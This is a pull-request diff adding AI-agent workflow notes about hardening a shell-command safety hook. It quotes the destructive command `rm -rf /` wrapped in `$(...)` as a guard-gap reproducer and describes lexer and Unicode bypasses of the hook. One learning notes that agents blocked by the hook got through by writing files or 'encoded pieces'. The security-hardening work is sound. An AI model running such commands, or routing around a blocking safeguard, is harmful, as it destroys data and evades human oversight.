### PR TITLE
feat(spec): revise TASC to 0.6.0 with control declaration and output provenance

### DIFF
--- a/.claude/settings.json
+++ b/.claude/settings.json
@@ -20,12 +20,10 @@
   },
   "enabledPlugins": {
     "typescript-lsp@claude-plugins-official": true,
-    "safety-net@cc-marketplace": false,
     "code-simplifier@claude-plugins-official": true,
     "code-review@claude-plugins-official": true,
     "playwright@claude-plugins-official": true,
     "coderabbit@claude-plugins-official": true,
-    "sentry@claude-plugins-official": false,
     "lisa-typescript@lisa": true,
     "lisa@lisa": true,
     "skill-creator@claude-plugins-official": true,

--- a/.lisa/input-1982.md
+++ b/.lisa/input-1982.md
@@ -1,0 +1,86 @@
+# Resolved Input Bundle — CodySwannGT/lisa#1982
+
+## 1. Tracker / config verification
+- **tracker_provider: `github`** ✅ (`.lisa.config.json` → `"tracker": "github"`, `"source": "github"`, org `CodySwannGT`, repo `lisa`). No mismatch; proceed.
+- **Base branch / deploy:** `deploy.branches.production = "main"` — single-environment repo (main = production; `status:on-dev`/`status:on-stg` are dead labels). **PR target branch: `main`.**
+- **Build lifecycle labels:** ready=`status:ready`, claimed=`status:in-progress`, blocked=`status:blocked`, done(production)=`status:done`.
+- **Relevant quality gates:** lintBudgets `maxLinesPerFunction: 75`, `maxLines: 300`, `cognitiveComplexity: 10`; coverage global stmts 74 / branches 65 / funcs 60 / lines 75.
+
+## 2. Issue metadata
+- **Ref:** `CodySwannGT/lisa#1982` — https://github.com/CodySwannGT/lisa/issues/1982
+- **Title:** safety-net content guards miss command substitution nested in double quotes
+- **State:** OPEN · **Labels:** none · **Milestone:** none · **Author:** CodySwannGT (Cody Swann) · Created 2026-07-22 · **Comments: NONE (0).** No owner decisions recorded.
+- **Suggested work type:** **Bug / security-hardening fix** (guard gap). Fits `lisa:bug-fixer` / TDD reproduce-as-failing-test flow.
+
+## 3. Full issue body (verbatim)
+
+> ## Problem
+>
+> The safety-net content guards (rm/SQL/dd/custom-rule) do not catch a destructive command wrapped in a command substitution inside double quotes: a `$(...)`-wrapped catastrophic delete inside a double-quoted string is ALLOWED. This holds independent of the heredoc classifier — it is a gap in the guards themselves.
+>
+> Discovered during #1958's security review (Finding 2, `.lisa/security-review-1958.md`). It matters beyond a curiosity: it means the content guards are **not** a backstop for the heredoc wall — a payload that reaches the guards via an UNSUPPORTED classification is not necessarily screened for substitution-wrapped destructive commands. That coupling is why #1958's Finding 1 was rated CRITICAL rather than defence-in-depth-contained.
+>
+> ## Acceptance criteria
+>
+> - Substitution-wrapped catastrophic forms (a recursive-forced-delete of a root/home path nested inside `$(...)` within double quotes) are blocked by the content guard layer, not only by the heredoc wall.
+> - Existing allow cases (a literal `$(...)` that is not a guarded destructive command) are not over-blocked beyond the documented text-scan class.
+> - Fixtures driving the real hook, block/allow pairs.
+>
+> ## Notes
+>
+> Threat-model scoping applies: assess which substitution-wrapped forms are genuinely executable-destructive vs inert before widening guards, to avoid the overblocking-trains-bypass failure mode. Reproducers are in the #1958 review artifacts (`.lisa/security-review-1958.md`, `/tmp/hd1958/`).
+>
+> Found during #1958.
+
+## 4. Comment summaries / owner decisions
+- **Zero comments on the issue.** No owner decisions recorded.
+
+## 5. Related issues & their relevance
+
+| Issue/PR | State | Relevance |
+|---|---|---|
+| **#1958** (safety-net heredoc classifier FPs) | CLOSED / status:done | **Origin.** This ticket is Finding 2 of #1958's security review, split out as its own ticket per that review's explicit recommendation ("Recommend a separate ticket for the `$(…)` guard-boundary gap"). |
+| **PR #1994** ("fix(safety-net): pass quoted-heredoc literal payloads + close heredoc-lexer RCE bypasses") | **MERGED** 2026-07-23, `Closes #1958` | Fixed #1958 Finding 1 (heredoc-wall RCE) + 5 lexer bypasses (R1–R5). **Did NOT close #1982** — the content-guard blind spot is still open. Confirms this is fresh work. |
+| **#1959** (learnings ledger budget) | CLOSED | Not relevant — git-status noise, no functional relationship. Disregard. |
+| **#1960** (safety-net guard parity/hardening) | referenced throughout the hook | Prior hardening pass on the SAME file (RM_CMD path-prefix, quote-aware target boundaries, GIT_GLOBAL_OPTS). Test matrix/fixtures were built for #1960 — extend that matrix. |
+
+### Finding 2 verbatim from `.lisa/security-review-1958.md` (the exact defect)
+> #### FINDING 2 — pre-existing content-guard blind spot for `$(…)` in double quotes
+> `echo "$(rm -rf /)"` (single line, no heredoc) — `/tmp/hd1958/p_rm_plain.txt` — is classified SAFE(0) and **ALLOWED** on both `df5981888` and `df5981888^`. The rm content guard does not match `rm` immediately inside `$(` within double quotes. This is **pre-existing**, not this PR. It matters for severity: it means the content guards are **not a reliable backstop** when the heredoc wall is bypassed... (Demonstrated: `A6` = `$(rm -rf /)` in the fake window is ALLOWED — old parser blocked it at the wall, exit 20.) Recommend a separate ticket for the `$(…)` guard-boundary gap.
+
+**Positive controls the fix MUST preserve:** F1 literal heredoc bodies stay ALLOWED; command-proper `$(...)` on a header line stays BLOCKED; single-quote outer wrapper (`$(...)` inside `'...'`) is inert (bash does not expand) → correctly ALLOWED.
+
+## 6. Affected files (all under `/Users/cody/workspace/lisa`)
+
+**Source of truth (edit here):**
+- `plugins/src/base/hooks/parity-safety-net.sh` — the guard hook. Fanned *identically* (verified `diff -q`) by `scripts/build-plugins.sh` to:
+  - `plugins/lisa/hooks/parity-safety-net.sh`
+  - `plugins/lisa-cursor/hooks/parity-safety-net.sh`
+  - `plugins/lisa-agy/hooks/parity-safety-net.sh`
+  - `plugins/lisa-copilot/hooks/parity-safety-net.sh`
+  - ⚠️ Do not hand-edit the fanned copies — regenerate via the plugins build (`bun run build:plugins`). Tests run against `plugins/lisa/hooks/parity-safety-net.sh`.
+
+**Tests / fixtures (add block+allow pairs here):**
+- `tests/helpers/safety-net-guard-fixtures.ts` — the fixture matrix ("tables ARE the contract"). Existing `QUOTE_BOUNDARY` rows (`QB-B1`..`QB-B6`, `QB-A1`..`QB-A3`) cover `bash -c "rm -rf /"` boundaries but **NOT** the `$(...)`-in-double-quotes case. Add new rows (e.g. a `SUBST_BOUNDARY` group).
+- `tests/helpers/safety-net-guard-harness.ts` — drives the REAL hook; `HOOK_PATH = plugins/lisa/hooks/parity-safety-net.sh`.
+- `tests/unit/hooks/parity-safety-net-guards.test.ts` — the guards test consuming the fixtures.
+
+**Reference artifacts:**
+- `.lisa/security-review-1958.md` — Finding 2 + reproducer table (untracked local file).
+- `/tmp/hd1958/` reproducers — ephemeral; may be gone. Canonical reproducer is just `echo "$(rm -rf /)"`.
+
+## 7. Root-cause pointer (for the implementer)
+Gap is in the **rm content-guard layer** of `parity-safety-net.sh`:
+- rm-statement splitter (`tr '&|;' '\n'`, L291) + `RM_CMD` (L187) DO match `rm` inside `$(rm …` (the `(` is a valid non-alnum boundary), so the statement reaches the target checks.
+- **`RM_CATASTROPHIC_TARGET` (L208–209) fails:** trailing boundary class `qc="'\""` is only space/`'`/`"`. In `echo "$(rm -rf /)"` the target `/` is followed by `)`, not in the class → no match.
+- **Token-walk guard 1b (L244–289) fails:** `"$(rm` → strip one leading `"` → `$(rm`, which ≠ `rm`/`*/rm`, so `seen_rm` never trips.
+
+Fix direction (respect "don't overblock"): make the target-boundary class and/or token normalization aware of a `$(`…`)` command-substitution wrapper so an executable substitution-wrapped `rm -rf <catastrophic>` inside double quotes is caught, while leaving inert single-quoted `'$(...)'` and non-destructive literal `$(...)` allowed. Threat-model each form (double-quoted = expands = executable; single-quoted = inert) before widening.
+
+## 8. Summary fields
+- **work_item_ref:** `CodySwannGT/lisa#1982`
+- **tracker_provider:** `github`
+- **target environment / base branch:** none stated → default **`main`** (single-env, production=main)
+- **suggested work type:** **bug / security-hardening fix** (TDD: reproduce `echo "$(rm -rf /)"` as a failing block-fixture, tighten the rm content guard, add block/allow pairs, regenerate fanned plugin copies)
+- **owner decisions in comments:** none (zero comments)
+- **parity obligation:** single source `plugins/src/base/hooks/parity-safety-net.sh` → 4 fanned copies via `build:plugins`; keep all in sync.

--- a/.lisa/learnings-1956.md
+++ b/.lisa/learnings-1956.md
@@ -1,0 +1,73 @@
+# Learnings — work-item-sync-lanes (CodySwannGT/lisa#1956, PR #1979, merge 8ae55057d)
+
+Learner pass, 2026-07-22. Capture-only: all persistence attempts went through the
+executable contract (`persistLearningEntry` from `@codyswann/lisa/learnings`);
+no rules files touched, no issues filed, no commits made, ledger unchanged.
+
+**Budget context:** the ledger stood at **3989/4000** bytes at pass start (the
+state the #1960 pass left; its consolidations are still uncommitted working-tree
+changes). All four candidate appends were attempted through the contract and
+**rejected on the document budget** (measured 4626–4718 vs 4000). No legitimate
+SLL-6 consolidation remains to free space: the 7 resident entries are distinct
+failure classes (the #1960 pass already performed three merges), and folding any
+candidate into an unrelated high-confidence entry would dilute, not consolidate.
+Per the contract the outcome is budget-blocked drafts — never hand-truncation.
+The gardener relief-valve tickets (#1787–#1790) remain the path to headroom.
+
+## Disposition table
+
+| # | Learning (lead's candidate) | Disposition |
+|---|----------|-------------|
+| 1 | Research-then-verify: T1's AUTO_MERGE "both diffs quiet" discriminator was wrong for untouched-conflict stops; only the fixer's empirical probe caught it | **budget-blocked** — writer rejected append (measured 4626/4000). Draft `learner-3d247953d51d` below; confidence medium (single occurrence + commit-message attestation of the deviation, 15d5ee8fb) |
+| 2 | Narrow proof scope missed cross-suite docs-guard: 472/472 green while 6 assertions in tests/unit/strategies failed; full `bun run test` caught it | **deduped with #4, then budget-blocked** — one merged candidate (a near-duplicate sibling pair would be a bug). Writer rejected (4718/4000). Draft `learner-18d90d72b4f7` below; confidence medium (quality review ran the full suite empirically) |
+| 3 | Client-side gate relaxations need a server-side backstop inventory per consuming repo class (fix 5 symref surface acceptable only because validate-pr recomputes; Lisa's own CI lacks it → #1978) | **budget-blocked** — writer rejected (4675/4000). Draft `learner-c38678d60c08` below; confidence medium (security F1 live reproducer + #1978 already OPEN — the concrete gap is ticketed, so the entry carries only the general discipline, project scope) |
+| 4 | Docs↔code guard tests should pin load-bearing new fragments, not just tolerate new wording | **merged into candidate #2's draft** (same failure class: docs-guard tests vs wording changes; the strengthened pins in implement-env-base-branch.test.ts are the worked pattern) |
+| 5 | respond-to-review automation drove CHANGES_REQUESTED → APPROVED on #1979 with replies only, merging past two conceded minors | **evaluated: REAL gap (minor), then budget-blocked** — writer rejected (4635/4000). Draft `learner-333ca3554102` below with `scope:upstream-candidate` (root cause is the Lisa-managed drive-pr-to-merge review-response flow). Confidence low (single occurrence) |
+
+**Candidate 5 evaluation (lead asked):** real gap, not acceptable-as-is. Verified
+timeline on #1979: CodeRabbit CHANGES_REQUESTED 22:37:27 → claude reply-only
+comments → APPROVED 22:43:30 → merged 22:43:31, zero commits in between. The
+investigate-and-justify loop worked exactly as designed for invalid findings —
+but the two findings the replies *conceded* as valid-minor (missing mutant
+annotations, additional doc-pin suggestions) now exist nowhere except resolved
+review threads. Distinguishing justify-and-resolve from concede-and-fix (filing
+a follow-up for the latter) is a bounded, real improvement to the
+`lisa-drive-pr-to-merge` skill — hence the upstream-candidate marker, gardener
+routes it. Severity low: both minors were genuinely non-blocking.
+
+## Budget-blocked drafts (ready to persist verbatim once headroom exists)
+
+Ids are `learner-` + sha1(normalized rule)[0:12] — re-running this pass
+re-derives the same ids, so a later persist stays idempotent.
+
+```json
+{"id":"learner-3d247953d51d","rule":"Never code against a research note's claim about git plumbing without re-probing it in the implementing test — a documented probe matrix can be wrong for a state it never exercised.","why":"T1's 'both AUTO_MERGE diffs quiet' abort-safe discriminator would have wrongly blocked untouched conflict stops (unmerged index entries fail the cached diff); only the fixer's empirical re-probe caught it.","provenance":["https://github.com/CodySwannGT/lisa/issues/1956","CodySwannGT/lisa@15d5ee8fb",".lisa/research-1956.md"],"first_learned":"2026-07-22","last_confirmed":"2026-07-22","confidence":"medium"}
+{"id":"learner-18d90d72b4f7","rule":"A skill/doc wording change needs a full-suite run (or a grep for tests pinning the old wording) before commit — cross-suite docs-guard tests pin prose; when updating them, pin load-bearing new fragments, not just any sentence.","why":"472/472 green on the targeted proof command while six docs-guard assertions in tests/unit/strategies failed on the reworded lisa-implement skill; only the quality review's full bun run test caught it.","provenance":["https://github.com/CodySwannGT/lisa/issues/1956","https://github.com/CodySwannGT/lisa/pull/1979","tests/unit/strategies/implement-env-base-branch.test.ts"],"first_learned":"2026-07-22","last_confirmed":"2026-07-22","confidence":"medium"}
+{"id":"learner-c38678d60c08","rule":"Before relaxing a client-side gate, enumerate where the server-side equivalent actually runs for every consuming repo class — a local exemption is only acceptable where a server-side recomputation backstops it.","why":"Fix 5's push-range exemption rode a repointable origin/HEAD symref; acceptable only because CI validate-pr recomputes server-side — and the review found Lisa's own CI lacks that backstop (#1978).","provenance":["https://github.com/CodySwannGT/lisa/issues/1956","https://github.com/CodySwannGT/lisa/issues/1978",".lisa/security-review-1956.md"],"first_learned":"2026-07-22","last_confirmed":"2026-07-22","confidence":"medium"}
+{"id":"learner-333ca3554102","rule":"Review-response automation must distinguish justify-and-resolve from concede-and-fix findings: a conceded-valid minor needs a follow-up ticket or ledger note before merge, or the concession is silently lost.","why":"The respond-to-review automation drove PR #1979 CHANGES_REQUESTED to APPROVED with replies only, merging past two conceded minors (mutant annotations, extra doc pins) that nothing now tracks.","provenance":["https://github.com/CodySwannGT/lisa/pull/1979","lisa-drive-pr-to-merge skill","scope:upstream-candidate"],"first_learned":"2026-07-22","last_confirmed":"2026-07-22","confidence":"low"}
+```
+
+Persist order once headroom exists (highest value first): `learner-18d90d72b4f7`
+(recurrence-prone across every doc-touching flow) → `learner-c38678d60c08` →
+`learner-3d247953d51d` → `learner-333ca3554102`. Note the #1960 pass also left
+two budget-blocked drafts (`learner-9d1e3d4c7fda`, `learner-40cd26e15dd5` in
+.lisa/learnings-1960.md) — six drafts now queue behind gardener relief; the
+gardener should sequence them, re-checking consolidation among the six at
+persist time.
+
+## Upstream candidates (marked, never filed — gardener routes these)
+
+- **Candidate 5:** `lisa-drive-pr-to-merge` review-response flow — add a
+  concede-vs-justify fork: conceded-valid findings get a follow-up ticket (or a
+  PR-body "deferred findings" record) before resolve+merge. Marker
+  `scope:upstream-candidate` is in draft `learner-333ca3554102`'s provenance.
+- **Candidate 3's concrete instance is NOT re-marked:** the Lisa-CI validate-pr
+  gap is already OPEN as #1978 (filed by the security-review flow before this
+  pass, not by the learner); duplicating it via a marker would create a second
+  routing path for the same work.
+
+## Desires / tooling-gap candidates
+
+None surfaced by this flow (no `kind: desire` items; runtime has no task-metadata
+store this session — candidates arrived via the lead's handoff message and the
+five flow artifacts, all reviewed).

--- a/.lisa/learnings-1957.md
+++ b/.lisa/learnings-1957.md
@@ -1,0 +1,61 @@
+# Learnings — linear-bare-repo-label (CodySwannGT/lisa#1957, PR #1981, merge 209af4609)
+
+Learner pass, 2026-07-22. Capture-only: all persistence attempts went through the
+executable contract (`persistLearningEntry` / `persistConsolidatedLearning` from
+`@codyswann/lisa/learnings`); no rules files touched, no issues filed, no
+commits made, ledger unchanged.
+
+**Budget context:** ledger at **3989/4000** at pass start and end. All three
+candidate writes were attempted through the contract and **rejected on the
+document budget** — including the one legitimate SLL-6 consolidation this pass
+found (measured: consolidation 4081, appends 4664 and 4645, vs 4000). Per the
+contract the outcome is budget-blocked drafts, never hand-truncation. The
+saturation defect is queued as #1959; gardener relief tickets #1787–#1790
+remain the headroom path.
+
+## Disposition table
+
+| # | Learning (lead's candidate) | Disposition |
+|---|----------|-------------|
+| 1 | Vendor-asymmetric acceptance rules (label OR component) silently strand the vendor lacking one surface — verify every vendor lane can supply at least one accepted form | **budget-blocked** — writer rejected append (4664/4000). Draft `learner-fc554b8b2a65` below; confidence medium (single occurrence + corroboration: research code-reading, quality-review empirical confirmation, and the TunnlAI intake-side taxonomy memory documenting the same two-label-family gap). No `scope:upstream-candidate` marker: the concrete Lisa-surface defect is already FIXED and merged (#1957 → PR #1981, 209af4609) — nothing remains to route upstream; the entry carries only the general design discipline |
+| 2 | Idle-notification-without-deliverable recovery via SendMessage resend worked as documented | **dropped — already-captured**, confirmed. Correction: the trap lives in `.claude/REFERENCE.0003.md:371-377` (idle is normal, not error/completion; messages wake idle teammates), not PROJECT_RULES. The recurrence matched the documented recovery exactly — no strengthening needed, and no rules file may be touched by this pass regardless |
+| 3 | Roster slimming keyed to trust-boundary analysis (security lens folded into quality for same-authority-domain vocabulary widening; spec-conformance skipped when no AC) | **budget-blocked** — writer rejected append (4645/4000). Draft `learner-f2255ca6f248` below; confidence low (single occurrence — one flow where the slim roster proved adequate; roster-1957.md's own hedge "if it finds one, a dedicated security pass will be added" is the safety valve the rule preserves) |
+| 4 | Empirical hostile-input probing (17 near-miss labels) as the review standard for exact-match acceptance widening | **merge-into `learner-9df011bc59dd` — budget-blocked**. Same failure class as the resident "a gate must prove it works… hunt bypasses with live reproducers" entry (itself a #1960-pass three-way merge); a sibling would be a bug. The consolidation (supersede `learner-9df011bc59dd`, extend to acceptance *widenings*, add #1957 provenance, refresh last_confirmed) was attempted via `persistConsolidatedLearning` and rejected (4081/4000 — only ~81 over; first in persist order below). Draft `learner-3d14fe5a695c` below; confidence high (4th corroborating occurrence of the class) |
+
+## Budget-blocked drafts (ready to persist verbatim once headroom exists)
+
+Ids are `learner-` + sha1(normalized rule)[0:12]; re-running re-derives the same
+ids, so a later persist stays idempotent. **`learner-3d14fe5a695c` must be
+persisted via `persistConsolidatedLearning(root, entry, { supersede:
+["learner-9df011bc59dd"] })`** — it replaces a resident entry (net ~+81
+measured), not an append. The other two are plain appends.
+
+```json
+{"id":"learner-3d14fe5a695c","rule":"A control must prove it works, not just run green: pair invocations with success-marker assertions, red-leg a deliberate failure, and for matching-rule guards or acceptance widenings hunt bypasses with hostile near-miss probes.","why":"Vacuous gate #1754, two bypasses behind 138 green fixtures (#1960), and #1957's bare-label widening (17 hostile probes) were each settled only by deliberate attack.","provenance":["https://github.com/CodySwannGT/lisa/pull/1754","https://github.com/CodySwannGT/lisa/pull/1753","https://github.com/CodySwannGT/lisa/pull/1976","https://github.com/CodySwannGT/lisa/issues/1957"],"first_learned":"2026-07-19","last_confirmed":"2026-07-22","confidence":"high"}
+{"id":"learner-fc554b8b2a65","rule":"When a check accepts alternative evidence forms (label OR component), verify every vendor lane can actually supply at least one form — an alternative only one vendor has silently strands the others.","why":"assertRepoScope accepted the bare repo name only via Jira components; Linear has no components, so Sentry-origin bare-labeled issues could never bind until #1957 widened the label arm.","provenance":["https://github.com/CodySwannGT/lisa/issues/1957","https://github.com/CodySwannGT/lisa/pull/1981","all/copy-overwrite/scripts/lisa-work-item.mjs"],"first_learned":"2026-07-22","last_confirmed":"2026-07-22","confidence":"medium"}
+{"id":"learner-f2255ca6f248","rule":"Roster-size by trust boundary: a change widening accepted vocabulary within one authority domain folds the security lens into quality review; dedicated passes are for boundary crossings. Skip spec-conformance when the item has no AC.","why":"#1957's slim roster (security folded into quality T3, no spec-conformance) proved adequate: the folded lens ran 17 hostile probes and the verifier covered the plan-derived spec.","provenance":["https://github.com/CodySwannGT/lisa/issues/1957",".lisa/roster-1957.md",".lisa/quality-review-1957.md"],"first_learned":"2026-07-22","last_confirmed":"2026-07-22","confidence":"low"}
+```
+
+Persist order once headroom exists: `learner-3d14fe5a695c` first (consolidation
+— net ~+81 tokens, refreshes a high-confidence resident entry and retires what
+would otherwise become a near-duplicate class) → `learner-fc554b8b2a65` →
+`learner-f2255ca6f248`. The queue behind gardener relief is now **nine drafts**
+across three passes (2 in .lisa/learnings-1960.md, 4 in .lisa/learnings-1956.md,
+3 here); the gardener should sequence all nine and re-check cross-draft
+consolidation at persist time — in particular `learner-3d14fe5a695c` (this pass)
+subsumes nothing in the other files, but the #1956 drafts predate it and should
+be re-screened against its widened wording.
+
+## Upstream candidates (marked, never filed)
+
+None this pass. Candidate 1's concrete Lisa-surface defect
+(`all/copy-overwrite/scripts/lisa-work-item.mjs` component-only bare-name arm)
+shipped fixed in PR #1981 — marking it would create a routing path to work
+already done.
+
+## Desires / tooling-gap candidates
+
+None surfaced (no `kind: desire` items; no task-metadata store this session —
+candidates arrived via the lead's handoff and the four flow artifacts
+plan-1957.md, research-1957.md, quality-review-1957.md, roster-1957.md, all
+reviewed).

--- a/.lisa/learnings-1958.md
+++ b/.lisa/learnings-1958.md
@@ -1,0 +1,79 @@
+# Learnings — heredoc-classifier-fps (CodySwannGT/lisa#1958, PR #1994, merge a77ea85eb)
+
+Learner pass, 2026-07-23. Capture-only: no rules files touched, no issues filed, no
+commits made. **Zero entries persisted** — the ledger is fully saturated AND was being
+concurrently rewritten during this pass (see Budget/Hazard below), so all three durable
+candidates are recorded here as **budget-blocked drafts**, ready to persist through the
+executable contract (`persistLearningEntry` / `persistConsolidatedLearning`) once gardener
+relief (#1787–#1790) lands headroom.
+
+## Budget measurement (evidence for #1959)
+
+The `LEARNINGS_CONTRACT` cap is **4000 utf8 bytes** of the whole rendered document
+(`estimateLearningTokens` = `Buffer.byteLength(content,"utf8")`).
+
+The ledger **churned through three distinct states during this single pass** (concurrent
+`dss-1`/`dss-2` learner passes, commits `62a59e422`/`4afb4492f`):
+
+| Observation | Bytes | State |
+|---|---|---|
+| Pass start | 3989 / 4000 | 7 entries (bootstrap, 0d2a, 399a, **9df0**, fffa, model-computed, sll4) |
+| Mid-pass | 6961 / 4000 | **git merge-conflict markers embedded** (`<<<<<<< Updated upstream` … `>>>>>>> Stashed changes`) — **unparseable by the contract** (`parseLearningsFile` throws `Invalid project learnings file format` / `exceeds maxTokens 4000`) |
+| Pass end (frozen snapshot `/tmp/ledger-snapshot-1958.md`) | **3999 / 4000 (1 byte headroom)** | 8 entries, fully rewritten: 05f0, 1cf6, 877f, b6f5, **bcc1**, c7ba, model-computed, sll4 |
+
+The consolidation target I planned against (`learner-9df011bc59dd`, the "prove-it-works"
+class) **was superseded mid-pass** by the concurrent dss passes into `learner-bcc1acfca542`.
+
+### Measured persist attempts (each drafted entry vs the 4000-byte cap, against the 3999-byte end-state)
+
+| Attempt | Type | Rendered doc bytes | Verdict |
+|---|---|---|---|
+| C1 → supersede `learner-bcc1acfca542` | consolidate | **4204** | **OVER by 204** — writer would throw `exceeds maxTokens 4000 (measured 4204)` |
+| C2 append | append | **4756** | **OVER by 756** |
+| C3 append | append | **4719** | **OVER by 719** |
+
+Even the leanest option — SLL-6 consolidation of the highest-value candidate into an
+existing sibling — overflows by 204 bytes. Unlike the #1960 pass (which recovered space via
+three merges of redundant siblings), this pass's candidates are **new failure classes with
+no redundant siblings left to collapse**, so there is no consolidation slack. With 1 byte of
+headroom, **no append of any real entry is possible.** This is the saturation defect #1959
+targets, now also compounded by a concurrent-write / merge-conflict hazard on the single
+ledger file.
+
+## Disposition table
+
+| # | Candidate | Disposition |
+|---|-----------|-------------|
+| 1 | Adversarial-review-until-clean for grammar-emulating security code; re-attack **each fix's own new logic** (469 green tests + clean quality review still would-have-shipped 5 RCEs; only 5 iterated adversarial rounds with live executable reproducers found them) | **budget-blocked draft** `learner-92e12e1031ea` — **consolidates into `learner-bcc1acfca542`** (same "green/fixtures prove nothing → hunt bypasses with live reproducers" class; adds the grammar-emulation + re-attack-each-fix nuance and #1958/#1994 provenance; keeps first_learned 2026-07-19; confidence **high** — corroborated across #1754/#1766/#1960/#1958). Measured 4204/4000 |
+| 2 | Python Unicode str-ops (`isspace`/`splitlines`/`strip`/`split`) are supersets of bash's ASCII lexing; every use in a shell-parsing security control is a latent parser-vs-bash desync — use explicit ASCII sets | **budget-blocked draft** `learner-61ebea1d46c5` — new entry; `scope:upstream-candidate` (root cause in Lisa-managed `parity-safety-net-heredoc.py`); confidence **medium** (single flow, but two distinct predicates R2 `isspace` + `splitlines` each with proven live reproducers). Measured 4756/4000 |
+| 3 | Knowing when to STOP an unbounded hardening effort: when emulating an external grammar for a security boundary becomes a per-round arms race, escalate the stop/scope decision to a human with the threat-model reframing and move the durable fix to a different layer (#1982 content-guard backstop) | **budget-blocked draft** `learner-9533fb99de37` — new entry; folds in candidate 4's threat-model reframing (accidental-guardrail vs adversarial-boundary); confidence **medium** (single occurrence, concrete evidence: 5 bounded rounds + #1982 layer-change). Measured 4719/4000 |
+| 4 | Threat-model calibration: rating crafted-evasion bypasses of an accident-guardrail as CRITICAL may over-invest; severity depends on adversarial-vs-accidental intent | **dropped — folded into #3** (its actionable core is the guardrail-vs-boundary reframing, which is #3's escalation payload; not durable as a standalone and would sibling #3) |
+| 5 | Manifest/debris hygiene: an untracked `.playwright-mcp` scratch dir got scanned into the evidence manifest and blocked the final gate; gitignore transient MCP output | **dropped — one-off, already remediated in-PR** (commit `3c507efdc` dropped the debris + gitignored it; not a recurring durable rule; hostile-default drop) |
+
+## Budget-blocked drafts (ready to persist once headroom exists)
+
+```json
+{"id":"learner-92e12e1031ea","rule":"A control must prove it works, not just run green: red-leg a deliberate failure and, for grammar-emulating guards, hunt bypasses with live executable reproducers, re-attacking each fixs own new logic — green fixtures hid 5 RCEs here.","why":"Vacuous self-skipped gates (#1766/#1754) and HIGH guard bypasses behind 138 (#1960) then 469 (#1958) green fixtures were caught only by live-reproducer attack; #1958 took 5 rounds re-attacking each fix.","provenance":["CodySwannGT/lisa#1766","CodySwannGT/lisa#1754","https://github.com/CodySwannGT/lisa/issues/1958","https://github.com/CodySwannGT/lisa/pull/1994"],"first_learned":"2026-07-19","last_confirmed":"2026-07-23","confidence":"high"}
+{"id":"learner-61ebea1d46c5","rule":"Shell-parsing Python in a security control must use explicit ASCII sets, never Unicode str predicates (isspace/splitlines): each is a superset of bashs ASCII lexing and a parser-vs-bash desync that smuggles live substitutions past the wall.","why":"#1958 shipped 469 green tests, yet security re-attack found str.isspace() (NBSP/FS/ideographic space) and splitlines() Unicode supersets each smuggling a live $(...) past the heredoc wall (R2).","provenance":["https://github.com/CodySwannGT/lisa/issues/1958","https://github.com/CodySwannGT/lisa/pull/1994","plugins/src/base/hooks/parity-safety-net-heredoc.py","scope:upstream-candidate"],"first_learned":"2026-07-23","last_confirmed":"2026-07-23","confidence":"medium"}
+{"id":"learner-9533fb99de37","rule":"A control emulating an external grammar (bash lexer) whose hardening becomes a per-round bypass arms race should stop: escalate to a human with the guardrail-vs-adversarial-boundary reframing and move the durable defense to a lower layer.","why":"#1958 ran 5 adversarial rounds (R1-R5) chasing bash-emulation desyncs; the durable fix was a different layer (#1982 content-guard backstop making wall-misses non-critical), not a 6th round.","provenance":["https://github.com/CodySwannGT/lisa/issues/1958","https://github.com/CodySwannGT/lisa/pull/1994","https://github.com/CodySwannGT/lisa/issues/1982"],"first_learned":"2026-07-23","last_confirmed":"2026-07-23","confidence":"medium"}
+```
+
+- C1 must be persisted with `persistConsolidatedLearning(root, c1, { supersede: ["learner-bcc1acfca542"] })` (merge the still-true content of bcc1). **Re-verify bcc1 still exists at persist time** — it was itself created by a concurrent pass this session and could be superseded again.
+- C2 and C3 via `persistLearningEntry(root, entry)`.
+
+## Upstream candidates (marked, never filed — gardener routes these)
+
+- **Candidate 2** carries `scope:upstream-candidate`: the shared quote/comment/lexing model in
+  `parity-safety-net-heredoc.py` (a Lisa-managed hook surface) should replace Python
+  Unicode-aware string predicates with explicit ASCII sets across all five walkers. Per the
+  learner contract this was **not** filed as an issue.
+
+## Hazard note (concurrent write on the ledger)
+
+The single `.lisa/PROJECT_LEARNINGS.md` file was observed in a **git merge-conflict state**
+(conflict markers embedded, 6961 bytes, contract-unparseable) mid-pass, then rewritten to a
+clean 3999-byte 8-entry state by concurrent `dss-1`/`dss-2` learner passes. This matches the
+`ui-concurrent-queue-merge-hazards` class: parallel sessions serializing writes through one
+saturated ledger produce transient corruption and lost/superseded entries. Relevant to #1959
+beyond raw saturation: the relief valve must also address **concurrent-writer contention**,
+not just headroom.

--- a/.lisa/learnings-1960.md
+++ b/.lisa/learnings-1960.md
@@ -1,0 +1,75 @@
+# Learnings — safety-net-guard-parity (CodySwannGT/lisa#1960, PR #1976)
+
+Learner pass, 2026-07-22. Capture-only: all persistence went through the
+executable contract (`persistLearningEntry` / `persistConsolidatedLearning`
+from `@codyswann/lisa/learnings`); no rules files touched, no issues filed, no
+commits made. Ledger changes are **uncommitted working-tree changes** to
+`.lisa/PROJECT_LEARNINGS.md` for the team lead to land (or discard).
+
+**Budget context:** the ledger stood at **3996/4000** bytes at pass start —
+zero append headroom. Space was recovered by SLL-6 consolidation (three
+merges, including one three-way same-failure-class merge), after which exactly
+one new append fit. Final state: **3989/4000, 7 entries**. The gardener
+relief-valve tickets (#1787–#1790) remain the path to more headroom.
+
+## Disposition table
+
+| # | Learning | Disposition |
+|---|----------|-------------|
+| 1 | validate-push walks full remoteOid..localOid range; merged-main cannot push; new-branch recovery | **dropped — transient/superseded**: durable fix (range exclusion of base-reachable commits) already queued on #1956; capturing it would be a learning about a bug already scheduled to die |
+| 2 | PR branches move underneath concurrent sessions; fetch → checkout -B remote head → cherry-pick → push | **merged-into `learner-399a16b6f4ad`** (supersedes `external-branch-movers-race-pushes`; first_learned kept 2026-07-19; confidence high — #1779 + #1976) |
+| 3 | Safety-net blocks Bash commands quoting dangerous literals; compose via Write + --body-file / encoded pieces | **entry `learner-fffa7ca43d81`** (new; confidence medium — three agents in one flow; the hook re-demonstrated it live during this very pass by blocking a heredoc) |
+| 4 | `process.exit()` after piped stdout truncates at pipe buffer (512B observed); use `process.exitCode`; truncated JSON via `$(...)` can fail a gate OPEN | **budget-blocked** — writer rejected append (would measure 4071/4000). Entry drafted below, carries `scope:upstream-candidate` (root cause in Lisa-managed `scripts/lisa-work-item.mjs`). Persist after gardener relief, or lead routes the CLI fix directly |
